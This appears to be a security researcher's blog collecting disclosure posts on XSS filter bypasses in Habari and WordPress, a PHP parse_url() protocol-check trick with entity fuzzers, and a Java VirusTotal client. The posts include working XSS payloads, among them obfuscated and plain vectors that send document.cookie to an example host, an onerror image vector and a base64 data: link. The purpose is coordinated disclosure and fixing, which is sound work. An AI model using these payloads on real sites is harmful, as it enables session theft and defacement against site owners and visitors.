I want to share some security issues that I discovered about a month ago in Habari. All the vulnerabilities discussed here are fixed in Habari 0.7 RC3, after my collaboration with the Habari security team. This latest version was announced today, so I strongly encourage Habari users to update their blogs.
I recommend reading the whole blog post (it's not so boring), but if you want to skip the discussion of the Habari issues and go straight to a nice trick that abuses the PHP parse_url() function to bypass a protocol check (HREF attribute), take a look at the end of this post.
1. Habari 0.6.6 (current stable version)
1.1 The protocol check for a HREF attribute (in the name, email and comment fields) can be bypassed.
Habari allows users to insert HTML code in a post's comments, but the "filtering" process is not implemented correctly. Let's consider the A tag; it is possible to insert a link simply by submitting:
<a href="http://ss.ss">click</a>
When a non-valid protocol is used, the code is correctly rewritten to:
<a>click</a>
It seems that the filtering process works well... Actually, we can bypass the filter by inserting a leading whitespace character:
<a href=" javascript:alert(0)">click</a>
The protocol check is completely bypassed with this simple trick. Habari requires moderation for each comment, but an inexperienced admin could approve a malicious one and then click on it. I found the issue in inputfilter.php, where the URL is considered relative when it starts with a whitespace: a particular regex does not match, and that allows the bypass. You can check the code to better understand what happens.
inputfilter.php -> line 282
'(?P<scheme>[a-zA-Z][^:]*):(//)?'
It could be modified as follows:
inputfilter.php -> line 282
'(?P<scheme>[a-zA-Z ][^:]*):(//)?'
But that would be a very naive ( => bad) approach!! Other characters bypass the filter as well; I discuss them below, be patient. In any case, it is not a good idea to mark a link as relative just because it does not match the regex.
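To make the flaw concrete, here is a minimal Python sketch (not Habari's code) of a check built around the same pattern. It assumes the pattern is applied at the very start of the URL and that a URL with no matching scheme is treated as relative, as described above; naive_scheme and naive_is_allowed are hypothetical names.

```python
import re

# Same pattern as the one quoted from inputfilter.php. Applying it at the
# start of the URL is an assumption about how the filter uses it.
SCHEME_RE = re.compile(r'(?P<scheme>[a-zA-Z][^:]*):(//)?')


def naive_scheme(url):
    """Return the scheme found at the very start of url, or '' if none matches."""
    m = SCHEME_RE.match(url)
    return m.group('scheme').lower() if m else ''


def naive_is_allowed(url):
    # An empty scheme is treated as "relative, therefore safe": this is the flaw.
    return naive_scheme(url) in ('http', 'https', '')
```

Under these assumptions "javascript:alert(0)" is rejected, while " javascript:alert(0)" passes, because the leading space stops the pattern from matching and the URL falls into the "relative" bucket.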
Note that the name (the user who comments) and the email fields are affected by the same issue.
So let's exploit this vulnerability with an effective attack. The email field is shown in the admin section, so the blog administrator could click on it directly. An attacker can supply this vector in the email field:
<a href=" javascript:open(eval(String.fromCharCode(39,104,116,116,112,58,47,47,101,120,97,109,112,108,101,46,99,111,109,47,63,99,111,111,107,105,101,61,39,32,43,32,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101)))">CLICK ME!</a>
That's too simple! We could also modify the admin page content by using the DOM.
<a href=" javascript:eval(document.getElementById('site').innerHTML+=' Free sex? :P Go <a href=http://www.badsite.com>here</a>');">CLICK ME</a>
Cool screenshot:

1.2 Open tags are not automatically closed by the filter, so this can break the output.
The filter does not check whether an open tag is closed by the end of the comment, so the content of the page can be heavily modified. For example, if an A tag is opened and never closed, the rest of the page becomes part of the link, and any user who tries to add a new comment will end up clicking on the injected link.
<a href=" javascript:alert(0)">click me
This is not a very important issue, because the administrator can quickly check the tag balance when moderating comments, and can also fix it by editing the comment content.
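One possible way to balance tags automatically, sketched in Python with the standard html.parser module. This only illustrates the idea and is not what Habari does; OpenTagTracker, close_open_tags and the short VOID list are assumptions made for the example.

```python
from html.parser import HTMLParser

# Elements that never take a closing tag (deliberately short list).
VOID = {'br', 'img', 'hr', 'input', 'meta', 'link'}


class OpenTagTracker(HTMLParser):
    """Keeps a stack of the tags that are still open."""

    def __init__(self):
        super().__init__()
        self.stack = []

    def handle_starttag(self, tag, attrs):
        if tag not in VOID:
            self.stack.append(tag)

    def handle_endtag(self, tag):
        if tag in self.stack:
            # Drop everything opened after the matching start tag as well.
            while self.stack.pop() != tag:
                pass


def close_open_tags(fragment):
    """Append closing tags for every element left open in fragment."""
    tracker = OpenTagTracker()
    tracker.feed(fragment)
    tracker.close()
    closers = ''.join('</%s>' % t for t in reversed(tracker.stack))
    return fragment + closers
```

Applied to the vector above, the dangling A tag gets its closing tag, so it can no longer swallow the rest of the page. The href itself still needs the protocol check.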
2. Habari 0.7-dp3
2.1 The protocol check for a HREF attribute (in the name and comment fields) can be bypassed.
The email field is filtered successfully, but the name and the comment fields behave as before.
2.2 Open tags are not automatically closed by the filter, so this can break the output.
See 1.2 for details.
2.3 IMG tags are not sanitized.
There are many ways to exploit this vulnerability; the simplest one uses the following vector:
<img src="X" onerror="alert(1)">
Notice that no user interaction is needed in this case!! If the admin approves the comment, all the users who visit the blog will be "attacked". Wow! :P
Fixes
The Habari team decided not to fix the issues in Habari 0.6.6, because its inputfilter is drastically different from the one used in 0.7. So they won't release any fixes for the current stable version, but they strongly encourage everyone to upgrade to 0.7. The fixes mentioned below therefore apply to the 0.7 version.
2.1
Let's concentrate on the parse_url and glue_url functions (inputfilter.php), which validate the URLs supplied in an attribute.
parse_url( $url ): it is based on PHP's native parse_url(), but a leading space actually "breaks" the native function! From the manual: "This function parses a URL and returns an associative array containing any of the various components of the URL that are present".
By supplying something like " javascript:blablabla", the returned array has no 'scheme' ( == protocol ) and the whole string ends up in the 'path' slot. It means that a lot of web applications that do not use that function correctly can be exploited... So even if the scheme is empty, we cannot immediately consider a URL relative and safe.
The Habari security team proposed this fix: use the trim() function to remove whitespace from both ends of the URL ( -> naive approach ).
The filter can be bypassed again with HTML entities, in decimal or hex encoding.
<a href="&#8;javascript:alert(0)">woot?!</a> // FF
<a href=" &#xa0;javascript:alert(0)">ooo</a> // Opera 11
Each entity in the URL is validated by the strip_illegal_entities( $str ) function, which calls _validate_entity( $m ). The injected entities are therefore converted into the corresponding characters and only then submitted to the filtering process. For instance, &#8; is trivially "converted" to the BACKSPACE char (U+0008). Many other characters bypass trim(), because it strips very few characters from the beginning and end of the input string. Take a look at the following resources:
- bypassing-a-protocol-check-href-attribute (by me)
- location.protocol fuzzer (by Gareth Heyes)
- Web Application Obfuscation (book), chapter 2, URIs section.
Given the above and the following two lines, the parsed URL is marked as relative. (code)
...
$r['is_pseudo'] = !in_array( $r['scheme'], array( 'http', 'https', '' ) );
$r['is_relative'] = ( $r['host'] == '' && !$r['is_pseudo'] );
...
glue_url( $parsed_url ): it rebuilds a URL that was split by a parse_url() call. With " javascript:blablabla" as input, the only thing it does is append the 'path' slot to the rebuilt URL.
...
if ( !empty( $parsed_url['path'] ) ) {
    $res .= $parsed_url['path'];
}
...
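The two quoted fragments can be replayed in a small Python sketch to see why the payload survives. The dictionaries stand in for the arrays returned by parse_url(), and classify and glue_path_only are hypothetical names; only the lines quoted in this post are modelled, not the whole Habari functions.

```python
def classify(parsed):
    """Port of the two quoted lines: returns (is_pseudo, is_relative)."""
    scheme = parsed.get('scheme', '')
    host = parsed.get('host', '')
    is_pseudo = scheme not in ('http', 'https', '')
    is_relative = host == '' and not is_pseudo
    return is_pseudo, is_relative


def glue_path_only(parsed):
    """Reduced stand-in for glue_url(): only the 'path' branch quoted above."""
    res = ''
    if parsed.get('path'):
        res += parsed['path']
    return res


# Parse result for " javascript:alert(0)": no scheme, everything in 'path'.
spaced = {'path': ' javascript:alert(0)'}
# Parse result for "javascript:alert(0)": the scheme is detected.
plain = {'scheme': 'javascript', 'path': 'alert(0)'}
```

For the plain input the scheme is flagged as pseudo. For the spaced input nothing is flagged, the URL counts as relative, and the path (which still carries the whole payload) is glued back unchanged.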
So how can we solve the issue?!
- Remove the & character -> bad, because & is useful in URLs.
- Mark as non-relative any URL that does not contain '.' or '/' characters -> bad, because an attacker can simply put these characters in the javascript payload.
- Check whether the URL contains the ':' character -> Good way!! A URL that contains a colon is never marked as relative.
I proposed the following patch in the inputfilter.parse_url() function:
// before
$r['is_relative'] = ( $r['host'] == '' && !$r['is_pseudo'] );
// after (=== so that a colon at offset 0, where strpos() returns 0, is also caught)
$r['is_relative'] = ( $r['host'] == '' && !$r['is_pseudo'] && (strpos($r['path'], ":") === false) );
In this way the issue is definitely solved!
OK, someone might think of bypassing the filter again by using an entity-encoded ':' (IE8)... This does not work because of the strip_illegal_entities( $str ) function.
The Habari guys decided not to follow my suggestion; they preferred to apply a regular expression to the URL before parsing it. They wanted to trim any Unicode whitespace-like characters from the string (and not just the ASCII ones that PHP's trim() handles), check this. Let's investigate again:
<?php
$url = ' javas cript:alert(0)';
$r = parse_url( preg_replace('/^[\pZ\pC]+|[\pZ\pC]+$/u', '', $url) );
// i) the regex matches strings that start or finish with a whitespace
// ii) info about pC and pZ: http://webcache.googleusercontent.com/search?q=cache:mCQugTShrlMJ:nadeausoftware.com/articles/2007/9/php_tip_how_strip_punctuation_characters_web_page+nadeausoft+how+to+strip&cd=3&hl=it&ct=clnk&gl=it&source=www.google.it
// iii) which characters are considered for the matching? *Some* of them are reported in http://www.bogofilter.org/pipermail/bogofilter/2003-March/001889.html
print_r ($r);
?>
It looks like a nice fix! Can we bypass the filter again? Sure, just by placing the whitespace in the middle of the URL!
<a href="javas cript:alert(0)">click</a>
Chrome and IE8 will definitely execute the alert! I know of three characters that can be used in the middle of the protocol in Chrome and IE 8, but of course this can change depending on the browser version.
1. U+0009 2. U+000A 3. U+000D
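The limit of trimming only the ends can be sketched in Python. Python's re module has no \pZ / \pC classes, so this sketch uses unicodedata to approximate them; trim_edges and is_space_or_control are hypothetical names, and the function is a rough equivalent of the regex, not a port of Habari's code.

```python
import unicodedata


def is_space_or_control(ch):
    # Unicode general categories Z* (separators) and C* (control, format, ...).
    return unicodedata.category(ch)[0] in ('Z', 'C')


def trim_edges(url):
    """Strip separator/control characters from both ends of url only."""
    start, end = 0, len(url)
    while start < end and is_space_or_control(url[start]):
        start += 1
    while end > start and is_space_or_control(url[end - 1]):
        end -= 1
    return url[start:end]
```

Leading and trailing characters such as U+0020, U+0008 or U+00A0 are removed, but a U+0009 between "javas" and "cript" is left where it is, which is exactly the case the browsers above still execute.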
So Habari decided to take a paranoid direction: the filter_var() function. The FILTER_SANITIZE_URL filter removes all illegal URL characters from a string, cool! What about IDNs? This may cause problems with some URLs, e.g. Swedish ones. We should first encode the URL into punycode and then use that function, but this process can produce other issues... (The security team was aware of this point.) They also remarked that the ':' character is valid in a path, and therefore my previous fix was not perfect.
Let's investigate by reading the RFC 3986, Relative Reference section:
A path segment that contains a colon character (e.g., "this:that") cannot be used as the first segment of a relative-path reference, as it would be mistaken for a scheme name. Such a segment must be preceded by a dot-segment (e.g., "./this:that") to make a relative-path reference.
So the best fix is to check whether a ':' appears in the first segment of a relative-path reference. I proposed a fix that works in this direction, and in my opinion it's a very good solution:
...
$r['is_relative'] = ( $r['host'] == '' && !$r['is_pseudo'] );
if ( strlen($parsed['path']) > 0 ) {
    $s = substr($parsed['path'], 0, 1);
    // relative-path reference -> !(network-path reference OR absolute-path reference)
    if ( $s != '/' ) {
        $n = explode('/', $parsed['path']);
        // avoid something like this: javascript:alert(0)+[]+/sd/.source
        // (!== false also catches a colon at offset 0, where strpos() returns 0)
        if ( count($n) > 1 && strpos($n[0], ':') !== false )
            $r['is_relative'] = false;
        // avoid something like this: javascript:alert(0)
        else if ( count($n) == 1 && strpos($parsed['path'], ':') !== false )
            $r['is_relative'] = false;
    }
}
if ( $r['is_pseudo'] ) {
...
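The RFC 3986 rule behind this check fits in a few lines of Python. This is a sketch of the rule itself, not a port of the patch, and first_segment_has_colon is a hypothetical name.

```python
def first_segment_has_colon(path):
    """True if the first segment of a relative-path reference contains ':'.

    Such a path would be mistaken for "scheme:rest", so it must not be
    treated as a harmless relative URL.
    """
    if not path or path.startswith('/'):
        # Empty, absolute-path or network-path reference: the rule does not apply.
        return False
    return ':' in path.split('/', 1)[0]
```

Both "javascript:alert(0)" and "javascript:alert(0)+[]+/sd/.source" are caught, while "./this:that" and "dir/this:that" stay valid relative paths, as the RFC allows. A colon at offset 0 (":x") is caught as well.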
In the end the Habari security team decided on a cool fix: extracting a clean version of the supplied scheme. The solution uses PHP's filter_var() with the FILTER_SANITIZE_URL filter to get a truly sanitized scheme, but uses the non-sanitized URL to parse the rest of the data, in order to allow IDNs. So this is not the most elegant way, but probably the cleanest.
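The idea of taking the scheme from a sanitized copy while leaving the original URL untouched can be sketched in Python as follows. This is not Habari's code: sanitize_ascii is only a rough stand-in for FILTER_SANITIZE_URL (it keeps printable ASCII without the space, while the real filter has its own character list), and clean_scheme and is_allowed are hypothetical names.

```python
import re


def sanitize_ascii(url):
    # Rough stand-in for FILTER_SANITIZE_URL: drop spaces, control characters
    # and everything outside printable ASCII.
    return ''.join(ch for ch in url if '!' <= ch <= '~')


# Scheme grammar from RFC 3986: ALPHA *( ALPHA / DIGIT / "+" / "-" / "." )
SCHEME = re.compile(r'^([A-Za-z][A-Za-z0-9+.\-]*):')


def clean_scheme(url):
    """Scheme of the sanitized copy of url, lower-cased, or '' if there is none."""
    m = SCHEME.match(sanitize_ascii(url))
    return m.group(1).lower() if m else ''


def is_allowed(url, allowed=('http', 'https')):
    # Only the scheme decision uses the sanitized copy; the caller keeps
    # working with the original url, so IDN hosts are not mangled.
    scheme = clean_scheme(url)
    return scheme == '' or scheme in allowed
```

With this approach a tab in the middle of "javas cript:" or a leading U+0008 no longer hides the scheme, and "./this:that" is still accepted as a relative path.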
I also have to mention this, the fix that prevents HTML in the name field.
2.2
There is no solution yet; with any luck it'll get fixed soon. Meanwhile, you can check the ticket here.
2.3
IMG tags were treated as special cases because of their "self-closing" behaviour. First of all, the Habari team decided to remove any unmatched types of nodes (details); then they introduced a whitelist for the attributes of IMG tags (src and alt) and improved the conditional that determines whether an attribute is valid (details).
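An attribute whitelist of this kind can be sketched in Python. The list (src and alt) comes from the description above; rebuild_img and the way the tag is re-serialized are assumptions made for the example, not Habari's implementation.

```python
from html import escape

# Attributes allowed on IMG, as described above.
IMG_ATTRS = ('src', 'alt')


def rebuild_img(attrs):
    """Rebuild an <img> tag from (name, value) pairs, keeping whitelisted attributes only."""
    kept = [(name.lower(), value) for name, value in attrs
            if name.lower() in IMG_ATTRS]
    rendered = ''.join(' %s="%s"' % (name, escape(value or '', quote=True))
                       for name, value in kept)
    return '<img' + rendered + '>'
```

Event handlers such as onerror simply never make it into the output, whatever their case. The src value would still have to go through the URL check discussed in 2.1.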
As said before, all these vulnerabilities have been fixed, and they are reported in the release notes and here. Some of the fixes were made in RC2, but the URL filtering issue still affects that version, so you have to update to 0.7 RC3. The Habari security team took a lot of time to investigate and fix, but I understand that XSS protection cannot be improved in just one day. :) They did not credit me, but it does not really matter.
Update: They credited and thanked me by updating the Habari 0.7 release announcement. Thank you guys! :)
However I want to thank Chris Meller for his patience and his very constructive collaboration.
------------------------------------------------------------------------------------------------------------------------------------------
Comments about the PHP parse_url() function
Finally, I want to stress that some characters in a URL force PHP's native parse_url() to output an interesting array: the scheme will be empty, while the path will contain the real protocol (e.g. javascript).
So let's consider the following PHP script:
<?php
$url = ' javascript:alert(0)';
$r = parse_url($url);
print_r ($r);
?>
For different inputs we get the following output:
| Input | Output |
| javascript:alert(0) | Array ( [scheme] => javascript [path] => alert(0) ) |
| [space]javascript:alert(0) | Array ( [path] => javascript:alert(0) ) |
| &#8;javascript:alert(0) | Array ( [path] => _javascript:alert(0) ) |
| javascript:alert(0) | Array ( [path] => javascript:alert(0) ) |
| [tab]javascript:alert(0) | Array ( [path] => _javascript:alert(0) ) |
| [newline]javascript:alert(0) | Array ( [path] => _javascript:alert(0) ) |
| java[space]script:alert(0) | Array ( [path] => java script:alert(0) ) |
Control characters are replaced by '_', while spaces (U+0020) "force" 'javascript' to appear in the path, wherever they are placed. Note that the PHP manual says: "This function doesn't work with relative URLs" and "This function is not meant to validate the given URL". So parse_url() is not a bad way to check a URL, but we need to use it in the right way!
Update: You can find a good fuzzer here (by Gareth Heyes), which inspects the location.protocol value. I realized that html_entity_decode is not completely good for our task; take a look at the comments for further very useful information.
Let's consider an XSS filter that tries to sanitize HTML code. It allows links like the following:
<a href="http://www.x.x">click me</a>
It uses a regex to perform the protocol check (http / https / ftp are allowed), but we realize that this regex is not so smart, so we can bypass it, for instance by using HTML entities. It should allow us to inject the following vector:
<a href=" javascript:alert(0)">click me</a>
By using a leading whitespace, the filter gets confused and lets it through!
I'd like to know which characters I can use in that position to bypass similar stupid filters that do reject whitespace. So let's fuzz with some simple PHP code:
HTML Entities
<?php
for($i=0; $i<=65535; $i++) {
    $r = html_entity_decode('&#'.$i.';', ENT_QUOTES, 'UTF-8');
    echo '<a href="'.$r.'javascript:alert(0)">click me</a> - '.$r.' - '.$i.' <br />';
}
?>
Results
Firefox 3.6.13 :  	  
Opera 11.00 : from 	 to and  
Chrome 8.0.552.237 : from  to  
IE 8 : from � to  
So an attacker could use the following vector, hoping that the unlucky user is running either Chrome or IE.
<a href="javascript:alert(1)">sad<a>
Let's try with hex encoding:
Hex encoding
<?php
for($i=0; $i<=65535; $i++) {
    $h = '&#x'.dechex($i).';';
    echo '<a href="'.$h.'javascript:alert(0)">click me</a> - '.$h.' - '.$i.' <br />';
}
?>
Results
Firefox 3.6.13 :  	 
 
  
Opera 11.00 : from 	 to 
 and  
Chrome 8.0.552.237 : from  to  
IE 8 : from  to  
Note that, for these vectors to work, the filter must not convert & into &amp;.
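The hex-entity fuzzer can also be written as a small Python generator, which makes it easy to restrict the range of code points. This is a sketch with a hypothetical name (fuzz_lines). Unlike the PHP version, it escapes the entity in the visible label, so the label shows the entity text instead of the decoded character.

```python
from html import escape


def fuzz_lines(start, stop):
    """Yield one test anchor per code point in [start, stop], hex-entity encoded."""
    for cp in range(start, stop + 1):
        entity = '&#x%x;' % cp
        # The href carries the raw entity (the browser decodes it);
        # the label carries the escaped entity so it stays readable.
        yield ('<a href="%sjavascript:alert(0)">click me</a> - %s - %d <br />'
               % (entity, escape(entity), cp))
```

Writing the lines for a range such as 0..32 to an HTML file and clicking through them in each browser reproduces the kind of test described above.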
Don't filters like this exist? I am sure you've already come across something similar :P
Hello guys! :)
A new version of Wordpress was released a few hours ago, as you can see here. It fixes a critical vulnerability, and the Wordpress Twitter profile called it "the most important security release of the year" (tweet).
[+] Plaintext advisory
I want to show you some details about this vulnerability, which I discovered; not updating your Wordpress blog could be really dangerous. Other contributions come from Jon Cave (duck_), a Wordpress core contributor.
Analysis
Here are some extracts from the mail I sent to the Wordpress security team.
The default install of Wordpress 3.0.3 allows comments like the following, in order to publish links to other sites:
<a href="http://site.it">click me</a>
The protocol check is done only when the href attribute name is written in lower case, so an attacker can insert any kind of protocol into the href attribute with a vector like the following:
<a HREF="javascript:alert(0)">click me</a>
This is a very bad way to sanitize HTML! We can bypass the protocol filtering by exploiting a case-sensitive match. It is also possible to steal the cookies of a logged-in user in a trivial way:
<a HREF="javascript:open('http://example.com/?cookie=' + document.cookie)">jjj</a>
I can also mount a more effective attack by inserting something like this:
<a HREF="javascript:eval(document.getElementById('site-title').innerHTML+=' IMPORTANT WORDPRESS UPDATE, go to badsite.com to download it!');">nice site</a>
An inexperienced admin could click on the link and see a fake update alert in the admin section. That is very very bad! Take a look at the screenshot to get an idea..
Wordpress requires approval for each comment, but a careless administrator could approve a fake comment that looks fine, or could simply click on the injected link.
So why am I not using a simple obfuscation method?! Actually the base64 encoding is perfect in this case:
<a HREF="data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==">click here</a>
The issue was in kses.php, the HTML sanitization library. The protocol check should be done in any case; lower case or upper case does not matter. You can find further information about the fix here. As you can see, the strtolower($attrname) function has been used to overcome the issue.
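The effect of normalizing the attribute name can be shown with a small Python sketch. It is not kses.php: attr_is_safe, scheme_of and the ALLOWED list are assumptions made for the example, and the normalize_name flag only exists to compare the behaviour before and after the fix.

```python
ALLOWED = ('http', 'https', 'ftp')


def scheme_of(value):
    """Very small scheme extractor: text before the first ':', lower-cased."""
    head, sep, _ = value.partition(':')
    return head.strip().lower() if sep else ''


def attr_is_safe(name, value, normalize_name):
    """Return True if the attribute passes the protocol check."""
    if normalize_name:
        name = name.lower()  # the equivalent of strtolower($attrname)
    if name != 'href':
        # Flaw when normalize_name is False: "HREF" skips the protocol check.
        return True
    scheme = scheme_of(value)
    return scheme == '' or scheme in ALLOWED
```

Without normalization, HREF="javascript:alert(0)" is accepted because the name never equals "href"; with normalization, both the javascript: and the data: vectors above are rejected.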
Disclosure timeline
20101219 Vendor contact
20101220 Vendor proposes a patch
20101220 The patch is ok in my opinion
20101220 Vendor takes time to fully audit and test kses.php
20101229 Wordpress 3.0.4 release
I wish you a happy new year :)
VirusTotal is a web service that scans URLs and files with a number of virus scanners. It provides a very simple public API, so we can automate the file submission and report checking process. There was no Java class for this task, so I decided to write one.
I'm working on the possibility of uploading a file and scanning it. I'll keep you updated...
>> You can find the whole code here [JVirusTotal]. You can look at the following example for further information.
JVirusTotal vt = new JVirusTotal(your_API_key);
String url = "http://www.x.x";
// submit an URL
vt.submitScanURL(url);
// retrieve an URL scan report
vt.retrieveURLscan(url);
// retrieve a file scan report
vt.retrieveFilescan(getMD5Sum(new URL(url)));
The following class is used to get the MD5 hash of a file, by giving its URL.
import java.io.IOException;
import java.io.InputStream;
import java.math.BigInteger;
import java.net.MalformedURLException;
import java.net.URL;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;

public class md5 {
    /**
     * Calculates the MD5 sum of the resource behind a URL.
     *
     * @param url file url
     * @return md5sum as 32 lowercase hex digits, or "" on failure
     */
    public static String getMD5Sum(URL url) {
        MessageDigest digest;
        try {
            digest = MessageDigest.getInstance("MD5");
        } catch (NoSuchAlgorithmException e) {
            e.printStackTrace();
            return "";
        }
        byte[] buffer = new byte[8192];
        int read;
        // try-with-resources closes the stream and avoids a NullPointerException
        // during cleanup when openStream() itself fails
        try (InputStream is = url.openStream()) {
            while ((read = is.read(buffer)) > 0) {
                digest.update(buffer, 0, read);
            }
            BigInteger bigInt = new BigInteger(1, digest.digest());
            // pad to 32 digits: toString(16) would drop leading zeros
            return String.format("%032x", bigInt);
        } catch (IOException e) {
            e.printStackTrace();
            return "";
        }
    }

    public static void main(String[] s) throws MalformedURLException {
        System.out.println(getMD5Sum(new URL("http://www.x.x")));
    }
}
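For comparison, the same chunked hashing can be sketched in Python with the standard hashlib module. The function name md5_of_stream is hypothetical; it takes any binary file-like object, so it can be tried without network access.

```python
import hashlib
import io


def md5_of_stream(stream, chunk_size=8192):
    """Return the MD5 hex digest of a binary stream, read in chunks."""
    digest = hashlib.md5()
    # read() returns b'' at end of stream, which stops the iteration.
    for chunk in iter(lambda: stream.read(chunk_size), b''):
        digest.update(chunk)
    # hexdigest() always returns 32 hex digits, leading zeros included.
    return digest.hexdigest()


print(md5_of_stream(io.BytesIO(b'a')))
```

The digest of the single byte "a" starts with a zero, which is the kind of value where a hex conversion without padding would come out one digit short.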
Via: Online Schools
Is this a dramatic situation?! People should use safer operating systems and browsers to solve some of these problems... (no IE, no win please..)
--- --- --- --- --- --- ---
Take a look @ History of hacking for a nice "paper"..
It's a very interesting report, but from what he says, it seems that all hackers are criminals.. how sad..
